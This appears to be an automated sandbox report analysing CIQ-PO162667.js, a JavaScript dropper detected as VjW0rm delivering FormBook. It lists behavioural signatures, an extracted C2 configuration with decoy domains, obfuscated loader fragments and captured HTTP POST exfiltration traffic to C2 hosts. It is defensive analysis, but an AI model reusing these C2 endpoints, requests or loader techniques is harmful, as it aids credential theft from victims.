Windows Analysis Report
CIQ-PO162667.js

Overview

General Information

Sample Name: CIQ-PO162667.js
Analysis ID: 635232
MD5: 3d6bfb78b4507146f160b706604da6f9
SHA1: 9c189911fb19625c1f9418096fb8b5c65b1d34e9
SHA256: b92b2c3a689cd2c5929f4123642004b7f23482c036dbf467813a18c91b3537df
Tags: jsVjw0rm

Detection

FormBook, VjW0rm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Yara detected VjW0rm
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Sigma detected: Drops script at startup location
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Wscript called in batch mode (suppress errors)
JavaScript source code contains functionality to generate code involving a shell, file or stream
Maps a DLL or memory area into another process
Creates multiple autostart registry keys
JavaScript source code contains call to eval containing suspicious API calls
Performs DNS queries to domains with low reputation
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
Drops script or batch files to the startup folder
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Creates a start menu entry (Start Menu\Programs\Startup)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
JavaScript source code contains large arrays or strings with random content potentially encoding malicious code
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection

Source: 00000000.00000003.283279518.000001E33FDAF000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.gafcbooster.com/np8s/"], "decoy": ["segredovideos.online", "kishanshree.com", "mjmvn.com", "44bb44.com", "brawlhallacodestore.com", "littlebeartreeservices.com", "topings33.com", "nachuejooj07.xyz", "waermark.com", "halecamilla.site", "basincreekmedia.com", "resolutionmeasles.com", "interlink-travel.com", "siberup.xyz", "getbusinesscreditandfunding.com", "shcylzc.com", "68chengxinle.com", "jkrsbarmybookarmy.com", "geo-pacificoffshore.com", "refreshertowels.com", "localbloom.online", "brandingaloha.com", "84866.xyz", "salondutaxi.com", "harmlett.com", "angelmatic.net", "o7oiwlp.xyz", "thepowerofanopenquestion.com", "tokenascent.com", "udrivestorage.com", "hengyuejiguang.com", "minotaur.network", "ratebill.com", "18w99.com", "2264a.com", "tentanguang.online", "muddybootslife.com", "vitality-patients.online", "heavymettlelawyers.com", "spxtokensales.com", "titair.com", "lazarusnatura.com", "rasheedabossmoves.com", "medyumgalip.com", "liveafunday.xyz", "xn--wsthof-camping-gsb.com", "xfd8asvtivg944.xyz", "myhvn.site", "964061.com", "screeshot.com", "mysbaally.com", "connectfamily.loan", "langlev.com", "labsreports-menalab.com", "gabefancher.com", "jdhwh2nbiw234.com", "pdwfifi.com", "losangelesrentalz.com", "brandpay.xyz", "jlbwaterdamagerepairseattle.com", "wps-mtb.com", "sekolahkejepang.com", "saastainability.com", "multiverseofbooks.com"]}
Source: CIQ-PO162667.js Virustotal: Detection: 25%
Source: CIQ-PO162667.js ReversingLabs: Detection: 21%
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Cex8di\5hol_r7nkdhp.exe, type: DROPPED
Source: rasheedabossmoves.com Virustotal: Detection: 7%
Source: C:\Users\user\AppData\Local\Temp\Cex8di\5hol_r7nkdhp.exe Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\bin.exe Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\Cex8di\5hol_r7nkdhp.exe Metadefender: Detection: 48%
Source: C:\Users\user\AppData\Local\Temp\Cex8di\5hol_r7nkdhp.exe ReversingLabs: Detection: 100%
Source: C:\Users\user\AppData\Local\Temp\bin.exe Metadefender: Detection: 48%
Source: C:\Users\user\AppData\Local\Temp\bin.exe ReversingLabs: Detection: 100%
Source: C:\Users\user\AppData\Local\Temp\Cex8di\5hol_r7nkdhp.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\bin.exe Joe Sandbox ML: detected
Source: 40.0.5hol_r7nkdhp.exe.c50000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.2.bin.exe.b0000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 40.0.5hol_r7nkdhp.exe.c50000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.0.bin.exe.b0000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 40.0.5hol_r7nkdhp.exe.c50000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 40.0.5hol_r7nkdhp.exe.c50000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: Binary string: cmmon32.pdb source: bin.exe, 00000002.00000002.444497879.0000000003790000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: cmmon32.pdbGCTL source: bin.exe, 00000002.00000002.444497879.0000000003790000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: bin.exe, cmmon32.exe, 5hol_r7nkdhp.exe
Source: Binary string: wntdll.pdb source: bin.exe, cmmon32.exe, 5hol_r7nkdhp.exe
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_032F1660 FindFirstFileW,FindNextFileW,FindClose, 18_2_032F1660
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_032F1659 FindFirstFileW,FindNextFileW,FindClose, 18_2_032F1659
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows

Software Vulnerabilities

Source: CIQ-PO162667.js Argument value: ['gYMty,WSH.CreateObject("adodb.stream")', 'var H3br3w,WSH.CreateObject("microsoft.xmldom").createElement("mko"),H3br3w.dataType,"bin.base64",H3', '"gYMty","WSH.CreateObject("adodb.stream")"']
Source: CIQ-PO162667.js Argument value: ['gYMty,WSH.CreateObject("adodb.stream")', '"gYMty=WSH.CreateObject("adodb.stream")"', 'var H3br3w,WSH.CreateObject("microsoft.xmldom").createElement("mko"),H3br3w.dataType,"bin.base64",H3', '"gYMty=","WSH.CreateObject("adodb.stream")",-426', '"gYMty","WSH.CreateObject("adodb.stream")"']
Source: CIQ-PO162667.js Argument value: ['"gYMty=WSH.CreateObject("adodb.stream")"', '"var H3br3w=WSH.CreateObject("microsoft.xmldom").createElement("mko")"']

Networking

Source: Malware configuration extractor URLs: www.gafcbooster.com/np8s/
Source: Joe Sandbox View ASN Name: COMING-ASABCDEGROUPCOMPANYLIMITEDHK
Source: Joe Sandbox View IP Address: 160.153.136.3 160.153.136.3
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.liveafunday.xyzConnection: closeContent-Length: 414Cache-Control: no-cacheOrigin: http://www.liveafunday.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.liveafunday.xyz/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 63 32 4d 48 36 44 65 50 3d 38 30 47 79 45 65 41 62 30 69 74 45 28 79 79 55 45 61 45 58 76 6b 68 67 42 43 35 79 79 46 73 6f 50 48 47 74 62 6c 7a 6d 6d 37 37 55 6b 31 37 59 76 46 31 4d 5a 61 4c 57 32 35 56 70 68 6b 79 6e 51 31 7a 50 39 59 5a 44 6a 45 64 7a 31 42 4e 58 54 68 6c 31 58 6f 72 41 43 70 30 6b 68 61 52 56 30 56 51 56 73 66 4d 56 61 75 4f 6a 45 36 4d 71 34 6f 67 69 55 31 59 59 72 4c 69 78 50 4e 39 6b 54 33 49 43 30 4e 6e 72 4c 31 61 36 6a 62 55 53 61 6e 70 6b 55 52 54 56 5a 6c 37 32 75 39 64 45 79 51 78 65 4a 31 46 65 79 58 4a 51 75 73 4b 4d 37 33 43 4a 45 31 47 48 42 63 44 36 45 67 78 69 68 52 6f 6d 44 4a 52 33 30 30 4d 65 58 31 38 77 32 30 5a 59 43 47 77 37 72 45 61 69 6a 58 41 44 71 76 58 61 77 30 6b 58 39 6b 35 68 79 5a 75 6f 6a 33 28 68 42 38 6f 6c 41 49 66 33 38 36 4b 32 57 48 48 4c 68 73 33 68 72 47 51 48 73 44 64 44 58 5f 4e 32 51 36 4b 5a 43 54 30 66 50 62 76 68 56 4f 48 4e 61 74 6d 63 32 62 28 44 54 34 53 47 58 7a 30 5f 69 65 77 6d 38 4c 7a 58 51 41 79 7a 66 72 4c 41 33 78 53 35 33 4c 67 4e 38 5a 63 78 44 6d 69 68 56 65 75 42 41 6f 7a 4d 52 33 78 4a 35 71 6c 6a 33 6b 36 45 4f 35 77 46 53 79 61 4a 6c 7a 34 4b 67 74 61 4f 50 37 79 59 35 49 35 6c 6d 5a 43 65 62 54 39 53 42 32 46 55 51 4c 77 4f 79 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
c2MH6DeP=80GyEeAb0itE(yyUEaEXvkhgBC5yyFsoPHGtblzmm77Uk17YvF1MZaLW25VphkynQ1zP9YZDjEdz1BNXThl1XorACp0khaRV0VQVsfMVauOjE6Mq4ogiU1YYrLixPN9kT3IC0NnrL1a6jbUSanpkURTVZl72u9dEyQxeJ1FeyXJQusKM73CJE1GHBcD6EgxihRomDJR300MeX18w20ZYCGw7rEaijXADqvXaw0kX9k5hyZuoj3(hB8olAIf386K2WHHLhs3hrGQHsDdDX_N2Q6KZCT0fPbvhVOHNatmc2b(DT4SGXz0_iewm8LzXQAyzfrLA3xS53LgN8ZcxDmihVeuBAozMR3xJ5qlj3k6EO5wFSyaJlz4KgtaOP7yY5I5lmZCebT9SB2FUQLwOyg).
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.liveafunday.xyzConnection: closeContent-Length: 36482Cache-Control: no-cacheOrigin: http://www.liveafunday.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.liveafunday.xyz/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 63 32 4d 48 36 44 65 50 3d 38 30 47 79 45 62 70 43 37 79 42 5a 6e 43 7e 33 51 49 45 44 37 46 78 69 4e 53 39 78 33 45 42 34 59 43 62 63 56 45 44 62 6e 2d 50 65 7a 57 50 31 6b 6d 46 69 5a 62 37 5f 36 71 78 74 72 55 4f 6b 51 31 37 78 39 59 56 44 67 45 31 6a 77 53 30 36 54 43 4e 30 56 49 72 38 42 70 30 48 6c 59 6c 34 30 56 63 37 73 66 45 46 5a 66 79 6a 47 66 49 71 36 72 49 58 61 31 59 61 31 62 79 74 4c 4e 78 44 54 33 77 61 30 49 66 72 4c 46 57 36 6a 34 4d 52 63 6c 42 72 54 42 54 55 53 46 36 79 67 64 59 33 79 51 31 38 4a 77 6c 65 79 68 78 51 68 59 47 4d 77 67 57 4b 64 56 47 34 46 63 44 4e 41 67 39 4a 68 52 6b 51 44 4c 39 4e 30 42 45 65 57 46 38 7a 7a 6e 70 68 46 52 73 57 34 55 47 5f 6a 58 4e 70 72 2d 4c 38 77 77 31 30 70 6d 77 58 73 4c 58 48 6a 31 7a 50 44 63 6f 68 5a 34 66 57 38 36 4b 57 57 48 48 70 68 74 6e 68 72 42 4d 48 74 67 31 44 41 75 4e 78 66 36 4b 51 4c 7a 31 4d 41 37 72 64 56 4f 50 64 61 70 71 36 32 71 37 44 53 5a 69 47 55 42 4d 38 33 4f 78 74 34 4c 79 42 61 67 79 47 66 72 4c 70 33 30 71 70 32 34 55 4e 36 4c 30 78 41 43 43 68 46 2d 75 42 5a 59 7a 4f 61 58 38 43 35 71 74 6e 33 68 7e 2d 4f 4b 63 46 52 6b 47 4a 72 78 41 4b 6a 64 61 4f 43 62 7a 74 32 59 73 71 6d 59 37 75 59 79 52 37 50 78 41 5f 61 62 68 4b 68 62 7a 67 7a 46 34 76 59 6b 54 56 54 79 42 50 59 55 64 4d 35 64 6c 5a 52 6c 37 45 43 64 34 6a 51 50 74 4c 53 58 42 4b 78 45 65 38 71 66 79 64 4e 69 38 72 70 44 35 54 33 66 79 56 4e 38 42 38 38 31 30 34 4c 30 30 5a 6e 66 65 6f 50 6f 79 66 63 72 37 65 4d 36 45 4d 56 5f 6b 68 71 58 32 36 6f 6b 7e 53 36 45 33 35 50 75 67 61 75 74 30 44 7a 
68 63 79 64 56 47 55 74 68 31 68 6a 35 4d 6e 47 41 65 44 6f 58 7e 58 58 74 6d 52 41 6b 49 36 46 63 55 62 33 55 39 78 34 67 78 74 67 77 70 73 6a 6b 52 5a 76 76 62 49 6d 68 4a 73 61 67 75 4f 4f 39 67 66 4f 39 67 58 69 38 64 47 39 4c 33 30 6f 5a 36 34 31 65 55 69 4e 58 53 4c 39 6e 72 6f 77 7a 78 32 6e 58 6f 37 42 44 6c 72 28 72 5a 52 6d 4d 67 74 77 72 77 6c 41 5f 75 6f 4d 5a 36 34 71 2d 78 32 70 43 78 4f 46 48 45 32 57 78 77 42 74 62 69 6d 4f 66 32 51 45 49 62 34 59 41 53 50 39 6d 30 6a 62 5f 67 33 36 51 4e 69 4a 4a 34 5a 4a 37 66 56 6b 35 4f 71 33 62 56 76 4e 68 6b 6c 57 71 6c 6f 32 43 62 4a 62 68 72 44 71 36 42 31 63 2d 73 55 78 44 30 49 33 4e 72 57 70 56 67 4d 36 68 31 4b 56 66 31 52 48 49 6a 53 71 78 64 63 73 31 56 61 41 58 4a 61 35 6f 4d 57 61 6c 59 76 37 53 77 6a 51 51 71 37 4c 68 6c 70 34 78 34 44 4c 45 30 73 50 49 67 70 4b 67 31 6f 4c 73 59 42 56 64 66 4a 65 2d 50 54 54 70 70 78 66 75 37 37 7e 42 4d 33 42 64 79 4b 6c 32 39 39 56 59 79 42 6b 6b 37 73 71 5f 50 61 4e 4a 5a 58 76 6c 70 6c 41 65 38 41 34 69
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.siberup.xyzConnection: closeContent-Length: 414Cache-Control: no-cacheOrigin: http://www.siberup.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.siberup.xyz/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 63 32 4d 48 36 44 65 50 3d 54 42 6a 6c 49 4a 43 7a 76 72 46 6c 48 44 46 71 44 41 63 48 44 58 65 58 65 4c 38 31 73 66 78 51 69 68 4b 71 32 4a 6a 49 56 68 44 33 37 6d 66 41 70 79 41 35 66 72 6e 43 32 53 52 33 4e 6d 6b 68 35 38 6a 34 50 53 58 42 5a 71 6f 2d 6e 54 44 61 4b 51 64 4c 72 69 34 53 47 38 72 37 75 58 72 56 4d 57 50 66 6f 4f 64 2d 30 4a 5a 48 47 6c 62 58 51 39 33 67 7a 4e 43 32 41 63 59 6e 62 6f 4e 6c 6d 56 7e 4b 6a 49 7a 47 48 7a 59 4d 77 45 30 68 44 50 6d 7a 35 71 65 5f 6f 66 58 69 42 56 76 79 52 5f 65 6f 57 48 55 31 41 58 37 43 35 49 4a 36 73 53 61 38 77 48 46 6f 42 58 67 35 57 5f 44 53 6f 73 69 78 6f 57 31 38 5a 54 69 6e 6e 48 73 48 34 62 51 53 54 58 4c 38 55 42 4a 6e 67 65 56 55 68 38 43 56 76 45 7a 36 31 63 32 44 75 62 75 6e 36 4a 44 72 65 63 43 4a 67 64 49 4b 57 61 63 53 72 51 6c 34 67 6d 41 61 36 46 76 6a 47 49 69 62 70 68 62 62 58 57 56 55 73 66 69 51 33 37 76 58 41 38 4d 42 4a 34 7a 57 5a 50 6e 59 39 73 73 46 4b 51 57 4c 31 35 73 50 64 51 62 76 61 62 4f 42 67 65 67 50 58 51 70 52 34 6b 36 6d 31 6e 49 59 44 58 6b 50 68 4c 6a 4a 58 45 59 45 33 2d 74 4c 48 6d 42 79 57 31 28 63 5a 31 6a 74 69 71 31 6b 4e 56 41 71 77 48 36 76 6a 35 7a 64 78 67 46 49 72 5f 4a 61 63 32 61 66 36 66 39 56 36 30 58 32 67 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
c2MH6DeP=TBjlIJCzvrFlHDFqDAcHDXeXeL81sfxQihKq2JjIVhD37mfApyA5frnC2SR3Nmkh58j4PSXBZqo-nTDaKQdLri4SG8r7uXrVMWPfoOd-0JZHGlbXQ93gzNC2AcYnboNlmV~KjIzGHzYMwE0hDPmz5qe_ofXiBVvyR_eoWHU1AX7C5IJ6sSa8wHFoBXg5W_DSosixoW18ZTinnHsH4bQSTXL8UBJngeVUh8CVvEz61c2Dubun6JDrecCJgdIKWacSrQl4gmAa6FvjGIibphbbXWVUsfiQ37vXA8MBJ4zWZPnY9ssFKQWL15sPdQbvabOBgegPXQpR4k6m1nIYDXkPhLjJXEYE3-tLHmByW1(cZ1jtiq1kNVAqwH6vj5zdxgFIr_Jac2af6f9V60X2gA).
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.siberup.xyzConnection: closeContent-Length: 36482Cache-Control: no-cacheOrigin: http://www.siberup.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.siberup.xyz/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 63 32 4d 48 36 44 65 50 3d 54 42 6a 6c 49 49 7e 70 69 34 42 4f 4e 7a 35 5a 45 7a 73 54 58 30 47 56 62 34 51 36 77 4b 34 49 6f 77 61 59 72 5a 79 70 62 45 47 6d 78 32 43 69 34 68 78 6d 66 75 43 55 75 51 31 7a 61 57 6f 69 35 38 71 70 50 53 62 42 61 72 77 51 67 79 53 39 4b 79 6c 45 6f 43 34 69 4a 63 71 6c 34 6a 69 48 4d 57 4b 49 6f 4f 55 6d 33 38 46 48 55 32 7a 58 62 61 6a 72 39 4e 44 39 4e 38 49 37 57 4a 78 53 6d 56 6e 50 6a 4b 33 47 47 44 45 4d 78 6b 45 6d 42 49 4b 30 6a 4b 66 33 74 66 58 37 54 56 72 6d 52 5f 61 57 57 47 34 31 41 6b 50 43 35 63 46 36 35 52 43 5f 6f 6e 46 70 51 6e 67 34 53 5f 4f 63 6f 73 7e 39 6f 55 59 48 61 68 7e 6e 39 58 73 47 72 5a 77 61 58 41 28 76 59 68 4d 31 67 66 6f 49 68 70 6a 47 76 46 4f 66 7a 75 65 34 72 34 58 49 36 4c 75 6c 62 38 43 46 34 4e 49 72 57 61 63 55 72 51 6c 6e 67 6d 51 61 36 47 50 6a 48 72 61 62 75 45 76 61 59 57 56 56 31 76 6a 46 76 62 71 6b 41 38 46 65 4a 35 61 7a 65 34 33 59 38 4a 51 46 4b 6a 4f 4d 35 5a 73 4a 5a 51 61 37 50 72 4f 65 67 65 67 58 58 56 56 37 34 54 53 6d 30 79 38 59 46 78 59 50 6b 37 6a 4a 4a 30 59 47 74 4f 52 62 48 6d 4a 32 57 78 37 6d 5a 43 62 74 6a 37 56 6b 4a 45 41 71 30 33 36 76 36 70 7a 4f 68 43 67 46 39 74 70 69 61 57 7e 4e 30 37 67 32 73 46 32 6d 28 34 39 5a 74 43 32 51 64 79 68 42 66 4a 39 38 44 61 77 6f 67 47 4f 79 6f 42 67 69 72 62 4a 41 79 63 4d 55 6f 78 47 76 6b 69 61 54 4f 4d 30 55 35 4e 68 52 69 68 69 41 72 6b 54 48 32 41 7a 71 4c 36 6d 6b 66 43 66 35 58 47 35 48 4c 79 75 4d 44 54 68 6c 6d 50 39 63 4f 51 76 6e 55 57 28 6d 65 4e 30 62 32 56 72 4a 76 5f 6e 44 4a 75 5a 74 34 64 69 52 48 
49 70 56 53 73 6d 56 70 5f 33 53 78 2d 62 46 39 35 45 55 74 6c 76 4d 6b 68 41 5f 5a 47 77 4a 57 68 53 56 62 73 43 54 52 61 7a 6c 4d 39 51 46 68 38 54 66 4d 30 50 43 41 47 42 51 62 4c 70 75 69 4c 31 47 45 4d 49 6b 67 4a 67 77 61 68 7e 62 6d 75 38 57 68 5a 42 62 45 57 4a 6d 75 57 6b 51 5a 4c 6b 77 79 72 59 64 34 55 48 43 6e 65 7a 64 35 55 4f 35 68 6f 4e 66 6a 46 44 71 65 54 52 4e 74 43 62 70 77 67 78 6c 44 6c 70 79 34 57 64 2d 30 32 53 53 64 4b 37 35 75 64 70 4a 5a 43 7a 49 52 76 4f 71 4d 72 78 71 31 32 70 74 32 53 48 75 46 75 54 57 57 65 7a 33 4a 37 68 67 32 4c 5a 36 6c 74 56 75 38 79 35 4b 6b 79 72 59 73 31 68 56 38 74 41 54 59 6d 35 58 71 4f 54 61 68 74 61 4e 4c 61 70 36 71 4f 4d 37 6d 75 4a 34 6e 63 6c 50 4a 71 5a 75 6c 76 76 5f 28 6b 46 42 6a 31 7e 69 38 64 63 6b 55 6e 69 2d 56 5f 4f 74 73 55 46 66 61 46 5a 61 49 51 37 34 4f 30 70 6b 4d 77 49 4e 63 37 71 52 7a 67 76 53 77 56 68 6e 76 6f 4a 69 68 64 53 64 79 5a 74 75 70 38 67 2d 75 38 45 4d 53 4f 63 4d 5a 41 31 32 65 61 54 63 32 45 59 4d 52 30 59 58 39 37
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.kishanshree.comConnection: closeContent-Length: 414Cache-Control: no-cacheOrigin: http://www.kishanshree.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.kishanshree.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 63 32 4d 48 36 44 65 50 3d 67 6e 66 51 70 6f 61 42 4b 75 64 35 39 2d 34 68 71 6e 76 68 58 4a 6c 4d 41 4c 38 5a 5a 4d 34 6e 42 64 69 6f 66 6a 59 49 35 64 57 74 31 33 39 69 31 6d 49 4d 55 45 6a 36 69 72 56 6f 75 53 70 55 72 32 49 32 6e 66 4c 44 6d 6a 75 4a 6b 59 6b 53 31 48 63 44 4d 52 4b 6a 46 31 38 42 6a 42 58 73 6f 63 6a 53 41 6c 79 64 63 62 74 47 68 72 68 61 4a 52 56 4f 59 6b 41 70 4d 45 28 50 68 79 6d 46 63 50 73 6f 57 68 6e 73 51 61 67 51 37 35 36 4f 6c 4e 51 6a 57 56 35 45 4f 59 49 46 70 62 74 54 49 4a 6a 76 30 33 39 46 4b 4c 45 54 38 35 6a 4e 7a 33 74 31 50 6d 6f 7a 71 5f 7a 44 72 43 46 70 6f 35 6d 76 65 38 6b 47 50 79 43 5f 64 79 78 43 46 53 75 67 4a 38 31 41 4a 31 6e 4c 6e 68 55 33 49 72 33 77 4f 77 33 44 34 41 58 41 55 68 4e 61 7e 67 4c 52 37 44 57 75 48 74 6b 7a 5a 45 43 66 78 67 72 32 41 72 52 77 41 41 64 66 45 33 77 4f 66 31 63 58 61 39 4e 4d 72 6b 79 35 44 41 37 57 79 66 39 58 51 59 6e 6b 75 62 64 70 37 41 39 6f 6b 6b 79 71 77 54 46 4b 65 31 28 65 51 76 6e 72 32 4f 4f 4d 32 35 73 6a 38 5a 63 75 75 70 71 4d 4c 70 39 6f 61 56 7e 6c 33 31 4e 36 38 5a 7a 77 5a 79 79 48 4d 63 45 53 54 58 69 41 65 69 62 74 4f 49 69 6f 6b 42 5a 63 37 54 49 70 54 64 64 44 73 6d 41 74 57 4a 6a 70 4b 68 4c 7a 58 43 48 38 70 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
c2MH6DeP=gnfQpoaBKud59-4hqnvhXJlMAL8ZZM4nBdiofjYI5dWt139i1mIMUEj6irVouSpUr2I2nfLDmjuJkYkS1HcDMRKjF18BjBXsocjSAlydcbtGhrhaJRVOYkApME(PhymFcPsoWhnsQagQ756OlNQjWV5EOYIFpbtTIJjv039FKLET85jNz3t1Pmozq_zDrCFpo5mve8kGPyC_dyxCFSugJ81AJ1nLnhU3Ir3wOw3D4AXAUhNa~gLR7DWuHtkzZECfxgr2ArRwAAdfE3wOf1cXa9NMrky5DA7Wyf9XQYnkubdp7A9okkyqwTFKe1(eQvnr2OOM25sj8ZcuupqMLp9oaV~l31N68ZzwZyyHMcESTXiAeibtOIiokBZc7TIpTddDsmAtWJjpKhLzXCH8pA).
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.kishanshree.comConnection: closeContent-Length: 36482Cache-Control: no-cacheOrigin: http://www.kishanshree.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.kishanshree.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 63 32 4d 48 36 44 65 50 3d 67 6e 66 51 70 74 36 58 4f 66 77 74 6c 4c 68 48 70 55 66 50 63 5a 31 53 4e 62 49 47 58 75 4d 4f 47 70 48 5a 43 53 70 70 7e 59 79 33 28 6e 68 66 7e 45 34 69 55 46 54 54 76 35 78 33 28 69 6c 54 72 32 51 55 6e 66 50 44 70 44 47 5a 6b 35 30 34 31 69 6f 45 42 52 4b 66 45 31 38 45 6e 44 79 4f 6f 63 6d 33 41 6b 33 41 64 72 52 47 75 70 5a 61 4c 53 39 46 62 45 42 69 50 45 76 62 76 53 36 63 63 50 45 4f 57 6c 6e 73 58 71 73 51 36 61 69 4e 6a 4d 51 38 53 46 35 63 66 6f 49 51 77 4c 6f 6b 49 4a 6e 4e 30 32 42 46 4c 35 77 54 38 6f 44 4e 30 47 74 79 42 32 6f 32 6f 50 7a 4b 68 69 5a 43 6f 35 37 39 65 39 67 57 50 44 6d 5f 50 79 78 44 42 44 32 47 4d 72 67 41 46 55 6a 73 6e 68 6f 65 4c 36 72 6f 4f 79 69 51 73 44 50 52 4e 77 68 38 7e 69 48 33 33 44 57 71 4d 4e 6c 78 5a 45 44 2d 78 67 72 55 41 72 42 77 41 44 39 66 46 56 49 4f 58 77 6f 51 52 39 4e 4a 79 30 79 68 65 51 33 75 79 66 6c 48 51 61 6e 4b 75 49 78 70 70 30 35 6f 6a 57 61 70 34 7a 46 49 61 31 7e 43 62 50 6d 6c 32 4f 4f 69 32 38 41 7a 28 76 59 75 76 34 71 4d 4c 4b 46 6f 59 6c 7e 6c 70 6c 4d 38 33 35 7e 31 5a 79 71 44 4d 65 63 6f 53 67 43 41 65 77 6a 74 4f 74 65 6f 6e 78 5a 63 76 6a 4a 78 43 38 74 4e 67 48 41 4f 46 37 43 56 66 58 79 32 58 53 4b 6b 39 32 7a 55 4c 70 37 79 53 69 32 67 52 4b 54 43 41 5f 75 47 6e 51 74 65 62 53 52 41 66 74 74 45 43 5a 62 67 79 58 44 34 6d 6b 72 45 6e 36 61 2d 35 65 34 78 28 67 62 6d 62 77 37 4b 48 48 49 6b 43 67 78 52 70 5a 51 39 30 55 69 51 75 34 71 7a 31 41 5a 4d 6c 2d 65 4a 75 52 58 61 47 2d 34 59 4d 34 56 39 68 78 41 79 77 66 71 75 76 78 51 6e 44 
